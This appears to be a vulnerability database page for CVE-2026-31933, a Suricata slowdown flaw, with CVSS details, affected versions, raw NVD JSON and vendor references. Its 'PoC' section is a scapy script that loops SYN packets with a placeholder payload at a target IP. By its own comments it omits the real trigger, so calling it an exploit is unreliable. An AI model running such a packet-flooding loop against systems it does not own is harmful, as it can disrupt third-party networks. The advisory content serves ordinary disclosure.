Security Vulnerability Report
中文
CVE-2026-31933 CVSS 7.5 HIGH

CVE-2026-31933

Published: 2026-04-02 14:16:29
Last Modified: 2026-04-07 18:30:03
Source: [email protected]

Description

Suricata is a network IDS, IPS and NSM engine. Prior to versions 7.0.15 and 8.0.4, specially crafted traffic can cause Suricata to slow down, affecting performance in IDS mode. This issue has been patched in versions 7.0.15 and 8.0.4.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE
Suricata < 7.0.15
Suricata < 8.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-31933: Suricata Performance Degradation # This script sends crafted traffic to the target. # Note: The specific payload pattern that triggers the slowdown # is not disclosed here; this is a generic framework. import sys from scapy.all import * if len(sys.argv) < 2: print("Usage: python poc.py <target_ip>") sys.exit(1) target = sys.argv[1] # Sending a TCP packet with a crafted payload # Replace the payload with the actual trigger if known ip = IP(dst=target) tcp = TCP(sport=RandShort(), dport=80, flags="S") payload = Raw(b"Crafted_Payload_To_Trigger_Slowdown") packet = ip / tcp / payload print(f"[*] Sending crafted packets to {target}...") send(packet, loop=1, inter=0.05)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31933", "sourceIdentifier": "[email protected]", "published": "2026-04-02T14:16:28.930", "lastModified": "2026-04-07T18:30:03.053", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Suricata is a network IDS, IPS and NSM engine. Prior to versions 7.0.15 and 8.0.4, specially crafted traffic can cause Suricata to slow down, affecting performance in IDS mode. This issue has been patched in versions 7.0.15 and 8.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-407"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.15", "matchCriteriaId": "1E0D4CF4-11E0-4FB1-9C17-F38257D376ED"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.4", "matchCriteriaId": "F35C5A48-CA30-43B3-9E53-D3E51C862604"}]}]}], "references": [{"url": "https://github.com/OISF/suricata/security/advisories/GHSA-hvp5-gpr6-j4gp", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://redmine.openinfosecfoundation.org/issues/8272", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.